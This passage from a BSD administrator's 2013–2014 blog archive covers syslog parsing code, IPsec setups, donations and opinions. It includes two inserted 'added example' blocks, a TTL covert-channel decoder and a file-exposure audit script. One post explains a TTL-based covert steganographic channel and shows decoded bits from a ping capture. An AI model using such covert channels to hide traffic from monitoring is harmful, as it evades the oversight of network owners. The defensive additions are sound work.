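/* Priority number (0..7) of a message, or -1 if the prefix is malformed. */
int pri_priority(const char *msg)
{
    int p = parse_pri(msg);
    return p < 0 ? -1 : p & 7;
}

const char *facility_name(int fac)
{
    if (fac < 0 || fac > 23 || facility_names[fac] == NULL)
        return "unknown";
    return facility_names[fac];
}

const char *priority_name(int pri)
{
    return (pri < 0 || pri > 7) ? "unknown" : priority_names[pri];
}

/* Format the result like the output shown above. The facility is printed
 * as fac << 3, which is how syslog.h defines LOG_USER and friends.
 * Returns a static buffer, or NULL if the prefix is malformed. */
const char *describe_pri(const char *msg)
{
    static char out[64];
    int fac = pri_facility(msg), pri = pri_priority(msg);

    if (fac < 0)
        return NULL;
    snprintf(out, sizeof(out), "facility: (%d)%s, priority: (%d)%s",
        fac << 3, facility_name(fac), pri, priority_name(pri));
    return out;
}

int main(void)
{
    /* The first sample is the datagram from the strace above;
     * the others are constructed for this example. */
    const char *samples[] = {
        "<13>Nov  3 00:00:14 pi: hi",
        "<38>Nov  3 00:00:15 pi sshd[123]: constructed sample",
        "<999>out of range",
        "no prefix at all"
    };
    size_t i;

    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        const char *d = describe_pri(samples[i]);
        printf("%-55s %s\n", samples[i], d ? d : "malformed PRI");
    }
    return 0;
}
```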



Smithing tools to understand code

November 8th, 2013

Yesterday I looked at the traceroute(8) source code in order to look for attack vectors. I came out empty handed. But I smithed a tool for my work that can be reused later I think.

This tool helped me overcome reading the function print_exthdr() better and determining it was safe. Not many people admit to doing this kinda stuff but I think I'll leave this to the next person that doubts OpenBSD's traceroute.c. I'm not ashamed at all! Should I be?



talk(1) patch to display timestamps

November 9th, 2013

I have written a small patch to talk(1) as found in FreeBSD (yes for a change!) to display timestamps when someone wrote a line. It's a little buggy but it works.

Thanks goes to Dylan who I've been talk(1)ing with and gave me the idea.



What's happening here?

November 11th, 2013

I think the media need to step back a bit. We all know that the US is spying on us but we don't need to be spoon-fed the paranoia. It's causing illogical decisions (firewalled europe anyone?) on parts of big powerful corporations who see opportunity to take away everyone's freedom. Let's get off this paranoid horse's back! I love freedom personally.



Slow Communication (ttldaemon.c)

November 11th, 2013

I have written a small daemon that changes the outgoing TTL on a FreeBSD host. It's a covert steganographic channel. When a bit is set the TTL is 65 and when it's 0 the TTL is 64. On the receiving end of a ping then perhaps you can make out the bits of a message:

jupiter$ ping -i 10 io.solarscale.de
PING io.solarscale.de (78.47.14.22): 56 data bytes
64 bytes from 78.47.14.22: icmp_seq=0 ttl=53 time=15.691 ms
64 bytes from 78.47.14.22: icmp_seq=1 ttl=53 time=16.608 ms
64 bytes from 78.47.14.22: icmp_seq=2 ttl=54 time=14.907 ms
64 bytes from 78.47.14.22: icmp_seq=3 ttl=54 time=15.247 ms
64 bytes from 78.47.14.22: icmp_seq=4 ttl=53 time=15.183 ms
64 bytes from 78.47.14.22: icmp_seq=5 ttl=53 time=16.017 ms
64 bytes from 78.47.14.22: icmp_seq=6 ttl=53 time=16.465 ms
64 bytes from 78.47.14.22: icmp_seq=7 ttl=54 time=15.134 ms
64 bytes from 78.47.14.22: icmp_seq=8 ttl=53 time=18.659 ms
64 bytes from 78.47.14.22: icmp_seq=9 ttl=53 time=15.542 ms
64 bytes from 78.47.14.22: icmp_seq=10 ttl=54 time=15.176 ms
64 bytes from 78.47.14.22: icmp_seq=11 ttl=54 time=16.411 ms
64 bytes from 78.47.14.22: icmp_seq=12 ttl=53 time=15.418 ms
64 bytes from 78.47.14.22: icmp_seq=13 ttl=54 time=15.438 ms
64 bytes from 78.47.14.22: icmp_seq=14 ttl=53 time=15.388 ms
64 bytes from 78.47.14.22: icmp_seq=15 ttl=53 time=15.918 ms
64 bytes from 78.47.14.22: icmp_seq=16 ttl=53 time=15.306 ms
64 bytes from 78.47.14.22: icmp_seq=17 ttl=53 time=15.347 ms
Notice how the TTL changes here. If it's 54 then the original TTL was 65, so 1 bit. So what was gathered here was 001100010011010000. Eventually I'd like to write a client to record this. But I'm gonna cheat for now and give you the source code.

I just give greetings and peace wishes but with a bit of coding it could be changed to something very creative!
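From the monitoring side, a reply TTL that keeps toggling between two adjacent values for one peer is the visible trace of this kind of channel, since the TTL on a stable path normally stays constant. The following added example (not the author's ttldaemon.c or its client; function names are this example's own) counts TTL changes in the ping capture above and recovers the bit string with the rule stated in the post.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_REPLIES 256

/* Ping replies copied from the capture shown above. */
static const char capture[] =
    "64 bytes from 78.47.14.22: icmp_seq=0 ttl=53 time=15.691 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=1 ttl=53 time=16.608 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=2 ttl=54 time=14.907 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=3 ttl=54 time=15.247 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=4 ttl=53 time=15.183 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=5 ttl=53 time=16.017 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=6 ttl=53 time=16.465 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=7 ttl=54 time=15.134 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=8 ttl=53 time=18.659 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=9 ttl=53 time=15.542 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=10 ttl=54 time=15.176 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=11 ttl=54 time=16.411 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=12 ttl=53 time=15.418 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=13 ttl=54 time=15.438 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=14 ttl=53 time=15.388 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=15 ttl=53 time=15.918 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=16 ttl=53 time=15.306 ms\n"
    "64 bytes from 78.47.14.22: icmp_seq=17 ttl=53 time=15.347 ms\n";

/* Collect the ttl= value of every reply; returns how many were found. */
static int collect_ttls(const char *text, int *ttl, int max)
{
    const char *p = text;
    int n = 0;

    while (n < max && (p = strstr(p, "ttl=")) != NULL) {
        char *end;
        long v;

        p += 4;
        v = strtol(p, &end, 10);
        if (end != p && v >= 0 && v <= 255)
            ttl[n++] = (int)v;
        p = end;
    }
    return n;
}

/* Number of times the TTL differs from the previous reply's TTL.
 * On a stable path this is 0; a high count for one peer is the signal. */
int ttl_transitions(const char *text)
{
    int ttl[MAX_REPLIES];
    int n = collect_ttls(text, ttl, MAX_REPLIES), i, changes = 0;

    for (i = 1; i < n; i++)
        if (ttl[i] != ttl[i - 1])
            changes++;
    return changes;
}

/* Recover the bits: the higher of two adjacent TTL values is a 1, the
 * lower a 0. Returns "" when the TTL never changes, and NULL when the
 * TTLs are not exactly two adjacent values (for example a route change),
 * because the rule from the post does not apply then. */
const char *ttl_bitstring(const char *text)
{
    static char bits[MAX_REPLIES + 1];
    int ttl[MAX_REPLIES];
    int n = collect_ttls(text, ttl, MAX_REPLIES), i, lo, hi;

    bits[0] = '\0';
    if (n == 0)
        return bits;
    lo = hi = ttl[0];
    for (i = 1; i < n; i++) {
        if (ttl[i] < lo) lo = ttl[i];
        if (ttl[i] > hi) hi = ttl[i];
    }
    if (hi == lo)
        return bits;
    if (hi - lo != 1)
        return NULL;
    for (i = 0; i < n; i++)
        bits[i] = (ttl[i] == hi) ? '1' : '0';
    bits[n] = '\0';
    return bits;
}

int main(void)
{
    const char *bits = ttl_bitstring(capture);

    printf("TTL changes between consecutive replies: %d\n",
        ttl_transitions(capture));
    printf("bits: %s\n", bits ? bits : "(not a two-value pattern)");
    return 0;
}
```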



Ordered a new book

November 15th, 2013

I have ordered...

  • Alternative DNS Servers: Choice and Deployment, and Optional SQL/LDAP Back-Ends - Jan-Piet Mens
I do hope this is worth having. This brings my orders for this year to 15 which I hoped to achieve, perhaps I'll order one or two more books but then that's it. I gotta read these too!



My first OpenBSD vps

November 17th, 2013

I have decided to switch plans on my Panama VPS americas.centroid.eu. I now have the option to run OpenBSD on it and I'm going to go for it.

I'm looking forward to IPSEC encrypting from io.solarscale.de and moon.virgostar.net to americas.centroid.eu. I have already set up strongswan on io and moon and americas was lacking this functionality but now it'll work. This should keep me busy until new years :-).



Sent Brad Smith 10 Euros

November 18th, 2013

A call on the undeadly openbsd journal was answered by me. I sent Brad Smith 10 euros for his new laptop. If 100 people do similar he'll be able to buy his new beast. Of course this is for the greater good! Brad lives in Toronto where I used to live for 7 years once, so this is from one (ex-)Torontonian to the next.



Wildcarddnsd BETA 8 has been released

November 19th, 2013

This is a small release for wildcarddnsd. We have a new debug feature and support for Raspberry Pi. It is a small release because I have dwindling time this year due to my job and there is little to no help coming from the outside. I welcome each and every person who wants to program on this daemon.



Americas is now OpenBSD

December 3rd, 2013

I have taken the new americas into "production" so to speak. It is serving all kinds of things and I'm currently developing software to make it even "safer" :-).



Merkle's puzzles not to defeat

December 4th, 2013

But to stall/delay/cost the adversary..

On chapter 2, page 34 of Applied Cryptography by Bruce Schneier, which is a rather old text, I found the gem of Merkle's puzzles. Ralph Merkle is renowned in the cryptography scene for finding out about these puzzles. While I don't want to go into explaining the puzzle, I do think that they can offer some protection when RSA asymmetric encryption fails. Pretend there is a quantum computer able to break asymmetric encryption. What I have done is implemented a Merkle's puzzle server that I'll be using to connect to my vps. The server creates a tunnel that is SHA1 HMAC'ed and AES-256-CBC encrypted. While this may seem enough, it's not. I still ssh within this tunnel but it does require some effort to get to the asymmetric encryption.

jupiter$ ls -1 *.c
mps.c			- creates the gigabytefile of encrypted messages
mpsclient.c		- uses a cracked message to talk to the server
mpscrack.c		- cracks a message in the gigabyte file
mpsd.c			- talks to the client to set up the encrypted tunnel
I'll be setting up a system to distribute over ssh the gigabytefile so that I can crack a message at home with it and from there use mpsclient to connect to the server.

I'm debating whether I should open source this. Give it time perhaps I will.



Wildcarddnsd is in production again

December 8th, 2013

After a long pause of more than a year, I've enabled wildcarddnsd on americas.centroid.eu. It is master to a bind9 (moon.virgostar.net) and an nsd3 (io.solarscale.de) nameserver. I was able to do this change due to wildcarddnsd's shared memory which didn't work on a freebsd jail.

Anyhow I only made a few mistakes moving the zones over and perhaps I should write a bind9 zones convert tool to wildcarddnsd zones.



2013 - Year in review

December 10th, 2013

Like every year I do the review on December 10th, so here goes.

December 13th 2012, Purchased two books
December 14th 2012, decided to expire goldflipper.net
December 18th 2012, registered amdeutschhof.de
December 18th 2012, December solstice in three days
December 18th 2012, Planets aligned on the 21st?
December 22nd 2012, My Spaceship
December 24th 2012, Merry Christmas!
December 28th 2012, Frankfurt-Helsinki in 6 hours by rail?
December 28th 2012, Looking for love in all the wrong places
December 31st 2012, Happy New Year 2013
January 7th 2013, Got a new monitor
January 7th 2013, How a base on Phobos could look like
January 10th 2013, Got a new book on WLAN's
January 11th 2013, Fibre Optics in the Canadian North
January 19th 2013, Let me explain how the Internet works...
January 20th 2013, This years traffic from Uranus (computer)
January 20th 2013, Date correction
January 24th 2013, Ordered two new books
January 24th 2013, Neat little vmware fusion trick
January 26th 2013, Bought a backup drive
January 28th 2013, Time Machine backup really slow
January 29th 2013, DECENTRALIZED
January 30th 2013, IRC
January 31st 2013, NAP of the Americas in Miami
January 31st 2013, Wire-tapping of the Cloud...
February 1st 2013, If I do upgrade Jupiter(computer)...
February 2nd 2013, This is actually cool!
February 9th 2013, Slowly getting ready for move
February 13th 2013, I've moved
February 14th 2013, My new IPv6 setup
February 15th 2013, Reinstated CVSWEB for my programs
February 17th 2013, Wildcarddnsd BETA 7 released
February 17th 2013, Introducing Fire Curses client
February 19th 2013, Firefox does DNS prefetching in OpenBSD
February 24th 2013, Donation time again
February 28th 2013, Teleworking: Mrs. Mayer you're (still) wrong
February 28th 2013, My first video entry
February 28th 2013, SVPradio 100th show next Wednesday
March 7th 2013, My first libssh program
March 8th 2013, Ordered two books
March 10th 2013, An era ends?
March 18th 2013, Equinox in 2 days
March 20th 2013, First day of Spring! Goodbye Winter!
March 24th 2013, Switched emea to FreeBSD
March 25th 2013, OpenBSD has released its 5.3 Song
March 30th 2013, My sorta first ruby program
March 30th 2013, Next wednesday is SVP Radio's 2nd year anniversary
April 1st 2013, Goodbye Source!
April 2nd 2013, I'm still anti-nuclear
April 6th 2013, Pre-ordered OpenBSD 5.3 CD
April 8th 2013, EFnet.XS4ALL.NL has K-lined Hetzner.de IP's
April 12th 2013, Total Rip-Off, I'm gonna keep it!
April 23rd 2013, Germany's Deutsche Telekom starts a 75 GB cap on DSL
April 25th 2013, Network Rearrangement Next Week
April 25th 2013, 1 month left for goldflipper.net
April 25th 2013, Saturn in Libra (close to the moon)
April 26th 2013, What DT is doing wrong
April 28th 2013, Taking a vacation from IRC
April 29th 2013, Why would a provider get rid of flatrate?
May 1st 2013, OpenBSD 5.3 released, 3 hosts upgraded
May 2nd 2013, The cravings are bad...
May 2nd 2013, My Compression Algorithm doesn't work
May 3rd 2013, Google Glass doesn't really phase me
May 4th 2013, We don't really have alternative access
May 5th 2013, Ordered a new book from Amazon
May 6th 2013, Earworms, Ohrwurms and co.
May 6th 2013, Changed blog a little
May 7th 2013, Asterisk patch
May 8th 2013, Hackathon Trademark
May 8th 2013, Strato.com HIDRIVE is real slow today
May 9th 2013, Finished upgrading to OpenBSD 5.3
May 10th 2013, New Intro Screen with Animation
May 11th 2013, NASA Asteroid Mission, not a bad idea
May 12th 2013, Got a shot of moon and Jupiter
May 13th 2013, Politics: I'm still a pirate
May 13th 2013, Crossing my fingers for Chris
May 13th 2013, Freifunk Schweinfurt is alive
May 15th 2013, My idea for a virtual reality headset
May 17th 2013, OpenBSD fixes a panic I found
May 21st 2013, Second Video Blog (Vlog?) entry
May 21st 2013, Experimenting with an RSS feed
May 22nd 2013, This is a valid RSS feed
May 22nd 2013, Move DNS to TCP?  Great Idea! Really...
May 23rd 2013, Alphabetical countup AWK beats Ruby 1.8
May 24th 2013, Added squid proxy to mars
May 24th 2013, Panama getting more bandwidth in 2014
May 25th 2013, Goldflipper.net expires today
May 29th 2013, Purchased an ipod touch
June 2nd 2013, Changed the Main Page
June 4th 2013, OpenBSD Arrived! VLOG entry #3
June 7th 2013, Donation time again
June 8th 2013, A second arctic route...
June 11th 2013, Success! I ran an app on my iPod
June 11th 2013, FAAC compiles into ffmpeg on OpenBSD
June 12th 2013, Vlog #4, just a test
June 14th 2013, Vlog #5 Got 3 books on IOS development
June 16th 2013, A german Google?  Will the market allow it?
June 18th 2013, Northern Solstice in 3 days
June 18th 2013, Some video about Wildcarddnsd
June 20th 2013, The moon last night
June 21st 2013, Sunny Solstice
June 23rd 2013, What government should do
June 25th 2013, Got a new book
June 25th 2013, The Key Satellites
June 25th 2013, UFO sighted
June 25th 2013, How everyones Internet should be like
June 26th 2013, This is for July 1st
June 30th 2013, Helping the NSA find baby-jesus
July 1st 2013, Cherries!
July 2nd 2013, Weird Sky, more UFO's?
July 3rd 2013, Good Engineering will prevent domestic Spying
July 4th 2013, A look back from 2001: Has my vision really changed?
July 5th 2013, 2014, the year of the cable?
July 6th 2013, Redder Cherries
July 7th 2013, DSL not working, getting LTE
July 9th 2013, Got LTE, Internet is stable again
July 11th 2013, How the Internet should be like (Pt. 2)
July 11th 2013, IT Security, SSH timing attack
July 17th 2013, This blog now obfuscates all data
July 18th 2013, Just more preaching about preventing spying
July 25th 2013, Centroid Blog for Lynx readers
July 28th 2013, Watched the Big Dipper out my Kitchen Window
August 5th 2013, I asked for a static IP again
August 15th 2013, Purchased a Raspberry Pi mini-computer
August 16th 2013, Wait a minute... not so fast... what changed?
August 18th 2013, Got Raspberry Pi, it's running Linux now
August 23rd 2013, Ordered a WLAN USB adapter for the Pi
August 25th 2013, Got two books I ordered
August 27th 2013, Vacationing in Canada next month
August 27th 2013, Will be guest DJ'ing at SVPradio.COM
September 3rd 2013, RadeonDRM on OpenBSD
September 4th 2013, Wildcarddnsd has little new features for BETA8
September 5th 2013, OpenSMTPD upgraded on io.solarscale.de
September 6th 2013, Just a thought, is Snowden a FUD-Trojan?
September 6th 2013, My public AP is on an Edimax adapter now
September 6th 2013, Good article by Bruce Schneier
September 12th 2013, Pre-Ordered OpenBSD 5.4
September 14th 2013, One year of ap.centroid.eu
September 15th 2013, Southbound Equinox in 7 days
September 15th 2013, Pirate Party got 2% in Bavarian election
September 21st 2013, Tomorrow
September 23rd 2013, e* came and went
September 25th 2013, SVPRadio appearance came and went
October 1st 2013, Some pictures from my vacation
October 9th 2013, First Snowday of the Year
October 13th 2013, I'm home now
October 13th 2013, Snowstorm in Nunavut on the 8th of October
October 14th 2013, Donated 150 euros to OpenBSD
October 14th 2013, A Train to Nowhere (Sep 28th - 30th)
October 14th 2013, Iqaluit, Nunavut (October 7th - 11th)
October 14th 2013, Upgraded my ipod touch to IOS 7
October 15th 2013, Ordered a Soekris
October 15th 2013, Network Rearrangement in 2 Weeks
October 17th 2013, Deutsche Telekom
October 19th 2013, Got the Soekris
October 21st 2013, Venus (Soekris router)
October 23rd 2013, Mars (G4 Cube) has been donated to the OpenBSD project
October 24th 2013, Testing TOR Onion Routing
October 26th 2013, OpenBSD 5.4 Arrived!
October 27th 2013, My OSPF Network
October 29th 2013, All computers upgraded to OpenBSD 5.4
October 29th 2013, Nvidia Card about to be replaced
October 30th 2013, A tiny blip on the W commit log screen
November 1st 2013, Centroid blog now available in CVS
November 1st 2013, OpenBSD 5.4 released
November 1st 2013, Fast Hellos are on
November 3rd 2013, Jupiter (computer) now on Radeon
November 4th 2013, Facilities and Priorities in syslog
November 8th 2013, Smithing tools to understand code
November 9th 2013, talk(1) patch to display timestamps
November 11th 2013, What's happening here?
November 11th 2013, Slow Communication (ttldaemon.c)
November 15th 2013, Ordered a new book
November 17th 2013, My first OpenBSD vps
November 18th 2013, Sent Brad Smith 10 Euros
November 19th 2013, Wildcarddnsd BETA 8 has been released
December 3rd 2013, Americas is now OpenBSD
December 4th 2013, Merkle's puzzles not to defeat
December 8th 2013, Wildcarddnsd is in production again



io <--> americas <--> moon now IPSEC'ed

December 12th, 2013

I have made 2 IPSEC tunnels between io.solarscale.de, americas.centroid.eu and moon.virgostar.net. These are all my 3 nameservers and they used to exchange zone files in plain text. Well not no more.

IO and MOON are FreeBSD so I found racoon the right combination for them. Americas which is OpenBSD uses isakmpd all for IKEv1 key exchange. The cipher negotiated is AES. It seems to work and I packet dumped to confirm that it's ESP'ed. Praise!



Southern Solstice in 6 days

December 15th, 2013

The solstice is here in less than a week! You can read about Solstices here. I predict if daylight is the same X days before and after the solstice in symmetric fashion then the days should be getting longer on the 28th of December which isn't too far off! At least this applies to the northern hemisphere! And in between is christmas, so it's not so bad is it?



I wish Europe would land on the moon too

December 16th, 2013

The moon is probably the most mysterious thing that every human can observe with their own eyes. When will Europe explore this object?



Compartmenting more $USER functionality

December 17th, 2013

It is well known that daemons (or if you want to call them servers you can), compartment themselves to their own user... so why can't I do the same for firefox browser? The idea I got from a slide from Mike Belopuhov's talk at ruBSD, see here. I recently found out I can do this. Here is what I've done:

jupiter$ grep firefox .fluxbox/menu         
      [exec] (firefox) { ssh -c arcfour -X pjpff@localhost /usr/local/bin/firefox }
This will ssh to localhost with X11Forwarding with the arcfour cipher (later I plan on using chacha), because arcfour is speedy. I had to do the same for URL's in thunderbird so that when I click on an url the pjpff user sees it in the browser. But there is one drawback. Pasting text back. So I've used the never used "email link" function to send back an URL of interest back to me and it goes back to the thunderbird. It works out well. Another obstacle is moving files for upload or download. I'm going to write a small daemon for that with a hopefully curses client.

I can now browse easier knowing that firefox can't browse through my files in some hidden or not-known functionality. I'm paranoid about that so I'd rather close a possible hole.
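
Running the browser under a second UID only protects files whose permission bits deny that UID. The following is an added example (not part of the original post) that lists what another local account could read in a home directory; the function names and the sample tree are constructed, and it assumes the sandbox account shares no group with the owner.

```shell
#!/bin/sh
# Added example: list what a second local account could read in a home directory.
# Assumption: the sandbox account (pjpff in the post) is in none of the
# owner's groups, so only the "other" permission bits apply to it.

# exposed_to_others DIR
# Prints regular files under DIR that are other-readable and reachable through
# directories that all carry the other-execute (search) bit. A directory
# without that bit is pruned: nothing below it can be opened by another UID,
# whatever the modes of the files inside. Ancestors of DIR are not checked.
exposed_to_others() {
    find "$1" \( -type d ! -perm -001 -prune \) \
        -o \( -type f -perm -004 -print \) | sort
}

# make_sample_home: build a constructed home directory and print its path.
make_sample_home() {
    h=$(mktemp -d) || return 1
    mkdir "$h/.ssh" "$h/private" "$h/public"
    : > "$h/.ssh/id_rsa";       chmod 600 "$h/.ssh/id_rsa"
    : > "$h/.ssh/known_hosts";  chmod 644 "$h/.ssh/known_hosts"
    : > "$h/private/taxes.txt"; chmod 644 "$h/private/taxes.txt"
    : > "$h/public/notes.txt";  chmod 644 "$h/public/notes.txt"
    chmod 755 "$h" "$h/.ssh" "$h/public"
    chmod 700 "$h/private"
    printf '%s\n' "$h"
}

# demo: show the report for a 0755 home, then again after tightening it to 0700.
demo() {
    home=$(make_sample_home) || return 1
    echo "home is 0755:"; exposed_to_others "$home" | sed "s|^$home/|  |"
    chmod 700 "$home"
    echo "home is 0700:"; exposed_to_others "$home" | sed "s|^$home/|  |"
    rm -rf "$home"
}
demo
```

With the home directory at 0755 the private key is protected by its own 0600 mode, but every 0644 file in a searchable directory is still readable by the browser account; at 0700 the whole tree is out of reach.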



I'm in love with the new Apple Mac Pro (cylinder)

December 19th, 2013

...and I have 6 months to decide if I want to make it my next work computer. I would be replacing Jupiter (Core i7-930) for everyday tasks. If I get it I'm considering putting OpenBSD natively on the 2012 Mac Mini that I have, so that at least one computer will run OpenBSD natively. OpenBSD will also run on this Mac Pro under vmware. Right now I'm high from its design, maybe that will die down in time. Jupiter turns 4 in June, it cost around 2000 euros, the Mac Pro would cost around 3500, but it's assembled in the USA which means good quality...



Donated 5 euros to the LibreOffice Document Foundation

December 22nd, 2013

I donated 5 euros to the Document Foundation. Thanks for allowing me to run slides for presentations with OpenBSD!



Living with Schizophrenia, what's it like?

December 23rd, 2013

I pop my pills every day and everything seems normal. I don't know how it would be without them, never tried. Stigma against Schizos? Probably exists. I'm not exactly rich in Germany.



Purchased Music off iTunes

December 23rd, 2013

I purchased 2 albums. One the Major Riddim by Don Corleon Music and the other Tarrus Riley Mecoustic album. I'm listening to these as I write this.



Merry Christmas

December 25th, 2013

May peace be unto thee!



Success, configuring the resolver right

December 26th, 2013

I started this thread in hopes of configuring my resolver right. Many wanted to help me and some laughed at me, but in the end I got what I wanted which was the "search ." in my resolv.conf. Would be a shame if this knowledge wasn't passed on to others and hence I suggested putting it in the manpage for resolv.conf. Just not sure on the right wording so I left it for others to take a peek.



It's all about distribution...

December 28th, 2013

Hackers in Germany are brainstorming what they can do against the state surveillance. My position is that the structure on which the Internet is built is wrong. There is no distribution, everything is centralized in a few major ISPs. If people had smaller ISPs to choose from, if people had been enabled to do their own Internet-networking then the monetary infrastructure would enable people to fend off government threats, as a collective. With the current model there are a few companies that are easily misled by state securities. We have a disaster as a result.



My Moonchart...and more

December 30th, 2013

I don't really really believe in astrology, but I find it amazing what sort of moons and planets were in my night sky at my birthday, so here it is my moonchart:

        moon  jupiter  saturn  mars           moon  jupiter  saturn  mars
1976     X                            1997                            X
1977                                  1998
1978                                  1999
1979     X                            2000
1980                                  2001
1981             X       X            2002
1982                     X      X     2003
1983                     X            2004
1984     X                            2005             X
1985                                  2006     X
1986                                  2007
1987     X                            2008
1988                                  2009
1989                                  2010                     X
1990                                  2011                     X
1991                                  2012                     X
1992                                  2013
1993             X                    2014                            X
1994                                  2015
1995     X                            2016
1996                                  2017             X

2025     X                            2029             X              X

I'll try to correlate this to events in my life sometime, but not yet.



Happy New Year 2014

January 1st, 2014

I went to bed early last night and slept through the fireworks, oh well. I think 2014 will be a good year.



Why China is fixated on the Moon

January 1st, 2014

Recently in a conversation I had with someone the Chinese ambitions on the moon came up. They want to exploit the moon for its resources, she said. And I said "I know, isn't it beautiful?". Then I told her about man's quest into space and the earth being a womb to a human baby-mind. She thought I was crazy.

So then I read this BBC article, about why China is fixated on the moon. My opinion is that we should use the moon's resources not to bring back to earth but to strengthen the space program. Use the resources to go out further. Also why is the rest of the world fixated on Mars? Does Mars have resources more abundant than the moon? Or easier to be stripped? When looking at the moon it is a system similar to that on earth and perhaps there is more abundance of elements there than we'll ever find on Mars? If nuclear fusion reactors (which don't exist yet) can be powered by helium-3 from the moon, which is taken as a sort of catalyst or inhibitor in order to control the fusion then I say go for it. That's the only element where I say bring it back to earth because there isn't much of it and it's easily transported. Don't bring back the metals though.. those are too bulky and make better sense to be used in spacecraft beyond moon orbit, or as antennas for dark side listening posts.

In the end, the article says there is potentially 10,000 years of power for the electric needs on earth in helium-3. If that's true it'll probably be a race among Chinese and American private power companies to get the most they can. Good luck, humanity!



My IT spendings are just about average in .de

January 2nd, 2014

Apparently a survey done by the European Information Technology Observatory concluded that in 2013 the average spending on IT per German is 1500 euros. So I'm actually just about at this average, small count of my spendings:

  1. provider m-net 20 euro/month
  2. provider vodafone 24 euro/month
  3. vps provider hub.org 35 dollars/month
  4. vps provider vr.org 20 dollars/month
  5. vps provider hetzner 8 euros/month
  6. KNF (franken.de) 5 euros/month

This comes to about 85 euros per month and then there are other costs involved. I think I'm just about average.



Ordered two books

January 5th, 2014

I have ordered two books from amazon. One dealing with OpenCL programming and the other with virtual reality, who knows where this will take me.



So, who owns the Internet?

January 8th, 2014

Here is an article with the same title and I admit to you I haven't read it. But I'd like to tell you what I think. The Internet is owned by corporations who are in it for profit. Since the profit margin is very small, yet people expect to be paid a lot they devise scarier methods (such as killing net neutrality, killing adfree content) to make even more profit. That is the truth. We, the people do not own the Internet, and we need to wake up and smell the coffee. We are however the soul of the Internet, and we make it a happening place.

So why do we not take ownership of it?

I have started by investing 20 euros into a WRT router that will be hooked up to freifunk.net, which is an initiative to mesh network everyone in Germany. There obviously are a lot of gaping holes causing no service. But if people pick up and add their own 20 euro router eventually it'll become a network. And it gives you ownership of it, albeit a very small yet important part of it. I'm looking forward to pioneering this network in my neighbourhood and hopefully people will jump on the bandwagon. More on this later.



Freifunk Franken

January 10th, 2014

This image shows the franken.freifunk.net access point on my ipod.


Cheers!



What would I do in Virtual Reality?

January 11th, 2014

I'm currently reading the book "Infinite Reality" by Blascovich and Bailenson and I think this book is a real thriller. I think virtual reality is not too far off for the consumer if you follow Oculus Rift progress. So what would I do with it? One idea is that I would create a "god room" as I call it. It's a room or object in the blackness of space, where I would create or architect new rooms.

Another idea is that I would be able to monitor my computers in a 3D fashion. For this I have the idea of using kqueue system calls to monitor filesystem on a host and to make an observer aware that something changed or that activity is in one part of the system, like a 3D popup or a change in colour. The filesystem would be represented as a tree perhaps, very simple to do (sorta). I have experience in networking and (mostly network) programming so I believe creating a virtual reality interface for network operators is perhaps also on the menu. Being able to examine traffic, suspend traffic, block traffic, create traffic and communication is what comes to mind. I poke around the OpenBSD Operating System once in a while to see how I would implement my ideas best when the time comes to have a head mounted display.

These not yet created applications can be used in security and debugging scenarios, which partially appeal to me because I'm often paranoid about things. To be able to go beyond what is possible with a keyboard and monitor interface is what is supposed to cure my paranoia and strengthen my trust in things. I think VR can do this, although the possibility exists that no electronic device can be trusted at all... ever. In that case the VR Interface is to unearth the threat-level.



Is the NSA so much smarter than everyone else?

January 15th, 2014

I don't think so. Mainly they probably get human resources from the tech industry, people that worked on specific platforms. They probably also have access to the source code of closed source programs. It's an area that they can enjoy hiding behind patriotism and laws. And then there is their huge budget. Money can buy smarts.

How does one resist such an organization that has all the resources in the world vs. a lowly system administrator? I've been wondering that all along. I considered going offline again as that is the ultimate way to stop this madness, but that isn't gonna work out as long as I work at a job in north america via the Internet. I'm still pondering this issue...



Donation time again

January 15th, 2014

I'm donating 200 euros to OpenBSD this early in the start of the year. In 2012 I donated over 500 euros to them and a little less than that in 2013, since 2014 seems to be a good year I may match the 2012 donation sum by end of year.

Also OpenBSD is looking for corporate and private support in donations to pay its 20,000 dollar a year electricity bill. Once they have that secured the project will continue otherwise it's threatened with shut-down. If you know anyone or you yourself are using OpenBSD don't you think it's time to open your wallet to a project such as OpenBSD which is in need?



The Apple magic wore off

January 19th, 2014

Yesterday I found myself looking through PC mainboards and Intel CPU's. I also inquired about whom to donate / hand-down my other PC to when I get the new one. So I likely won't be getting the Mac Pro even though it's a nice machine. I looked at ASUS Sabertooth TUF mainboard, if it's worth telling.



FreeBSD 10.0 released!

January 21st, 2014

FreeBSD 10.0 has been released. I look forward to making use of this on and off work. Congratulations to the FreeBSD Team. In the past I have donated money to them including 250 dollars last year, we'll have to see what I can do this year, but it's too early in the year to judge how much I want to donate. Right now it's celebration time for most of the BSD's!



Someone actively probed my MPS tunnel (MITM)

January 24th, 2014

My closed-sourced mpsd was probed by an unknown mitm attack, and it hung up.

Jan 24 13:48:51 americas mpsd[21598]: len too long 

At the same time I saw that my host was unable to be pinged past 99% packet loss. What's interesting to note here is that mpsd has a TCP tunnel open so there is sequencing and checksums involved, those were actively forged by the attack.



My apology to OpenBSD

January 28th, 2014

I dropped the bomb on OpenBSD by publicly announcing a program on a mailing list that at least in my case puts OpenBSD in an infinite loop. I reproduced this condition on another platform today and here is the console output:

So I want to say I'm sorry publicly on my blog. I don't know what I was thinking, but I was stressed that my VPS was constantly in this condition, and having to ask the admin of the VPS host to reset my VPS puts strain on everyone. I just hope someone at OpenBSD can fix this because I can't, I lack the skill, and it seems to be a difficult spot where this infinite loop is played out.



Purchased new iTunes Album

January 31st, 2014

I have decided to spend money on 1 album a month on iTunes. So last month I got Gappy Ranks - Shining hope and for the month of February I got Morgan Heritage - Here comes the kings. I like reggae music!



OS Changes, back

